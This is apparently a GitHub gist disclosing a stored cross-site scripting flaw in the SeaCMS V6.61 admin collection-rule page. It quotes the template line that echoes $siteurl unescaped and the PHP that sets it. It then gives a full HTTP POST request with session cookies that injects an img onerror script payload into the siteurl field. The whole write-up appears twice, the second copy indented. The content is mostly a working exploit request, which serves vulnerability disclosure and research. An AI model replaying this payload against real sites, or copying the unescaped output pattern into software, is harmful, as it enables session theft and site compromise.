alice19940905/gist:88b194b89e83c5c0a394f7f297111e12

## gistfile1.txt
Found available at admin/ templets/admin_collect_ruleadd2.htm

<tr>
    <th colspan="2" height="20" align="left"><span id="showurl">当前采集地址：<font color=red><?php echo $siteurl ?></font></span></th>
</tr>

Follow this $siteurl and find out from admin/admin_collect.php.

		$removecode = implode('|',$removecode);
		$listconfig = "{seacms:listrule cid=\"$id\" tname=\"$itemname\" intodatabase=\"$intodatabase\" getherday=\"$getherday\" siteurl=\"$siteurl\" playfrom=\"$playfrom\" downfrom=\"$downfrom\" autocls=\"$autocls\" classid=\"$classid\" removecode=\"$removecode\" inithit=\"$inithit\" pageset=\"$pageset\" pageurl0=\"$pageurl0\" pageurl1=\"$pageurl1\"  pageurl2=\"$pageurl2\" istart=\"$istart\" iend=\"$iend\" reverse=\"$reverse\"}";
		include(sea_ADMIN.'/templets/admin_collect_ruleadd2.htm');

payload：

POST /1/seacms%20V6.61/upload/houtai/admin_collect.php?action=addrule HTTP/1.1
Host: 172.16.244.129
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.13; rv:47.0) Gecko/20100101 Firefox/47.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Referer: http://172.16.244.129/1/seacms%20V6.61/upload/houtai/admin_collect.php?action=addrule&id=3
Cookie: PHPSESSID=ua6ajr7ncm6gd7ikuqmmktf3s7; safecode=1; Tiny_autologin=5898644673VFIIAQQDAARSAAZcDVcGDQ1UBAZUW1JXBAYABgcDVVU; cck_lasttime=1527667187818; cck_count=0
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 344

step=2&id=3&itemname=11&intodatabase=0&getherday=0&siteurl=aaa%22%3E%3Cimg+src%3Dx+onerror%3Dalert%281%29%3E
&coding=gb2312&playfrom=&downfrom=&autocls=0&classid=0&inithit=0&pageset=0&pageurl0=&pageurl1=&istart=1&iend=1
&pageurl2=&Submit=%E4%BF%9D%E5%AD%98%E4%BF%A1%E6%81%AF%E5%B9%B6%E8%BF%9B%E5%85%A5%E4%B8%8B%E4%B8%80%E6%AD%A5%E8%AE%BE%E7%BD%AE
	Found available at admin/ templets/admin_collect_ruleadd2.htm

	<tr>
	<th colspan="2" height="20" align="left"><span id="showurl">当前采集地址：<font color=red><?php echo $siteurl ?></font></span></th>
	</tr>

	Follow this $siteurl and find out from admin/admin_collect.php.

	$removecode = implode('\|',$removecode);
	$listconfig = "{seacms:listrule cid=\"$id\" tname=\"$itemname\" intodatabase=\"$intodatabase\" getherday=\"$getherday\" siteurl=\"$siteurl\" playfrom=\"$playfrom\" downfrom=\"$downfrom\" autocls=\"$autocls\" classid=\"$classid\" removecode=\"$removecode\" inithit=\"$inithit\" pageset=\"$pageset\" pageurl0=\"$pageurl0\" pageurl1=\"$pageurl1\" pageurl2=\"$pageurl2\" istart=\"$istart\" iend=\"$iend\" reverse=\"$reverse\"}";
	include(sea_ADMIN.'/templets/admin_collect_ruleadd2.htm');

	payload：

	POST /1/seacms%20V6.61/upload/houtai/admin_collect.php?action=addrule HTTP/1.1
	Host: 172.16.244.129
	User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.13; rv:47.0) Gecko/20100101 Firefox/47.0
	Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8
	Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
	Accept-Encoding: gzip, deflate
	Referer: http://172.16.244.129/1/seacms%20V6.61/upload/houtai/admin_collect.php?action=addrule&id=3
	Cookie: PHPSESSID=ua6ajr7ncm6gd7ikuqmmktf3s7; safecode=1; Tiny_autologin=5898644673VFIIAQQDAARSAAZcDVcGDQ1UBAZUW1JXBAYABgcDVVU; cck_lasttime=1527667187818; cck_count=0
	Connection: close
	Content-Type: application/x-www-form-urlencoded
	Content-Length: 344

	step=2&id=3&itemname=11&intodatabase=0&getherday=0&siteurl=aaa%22%3E%3Cimg+src%3Dx+onerror%3Dalert%281%29%3E
	&coding=gb2312&playfrom=&downfrom=&autocls=0&classid=0&inithit=0&pageset=0&pageurl0=&pageurl1=&istart=1&iend=1
	&pageurl2=&Submit=%E4%BF%9D%E5%AD%98%E4%BF%A1%E6%81%AF%E5%B9%B6%E8%BF%9B%E5%85%A5%E4%B8%8B%E4%B8%80%E6%AD%A5%E8%AE%BE%E7%BD%AE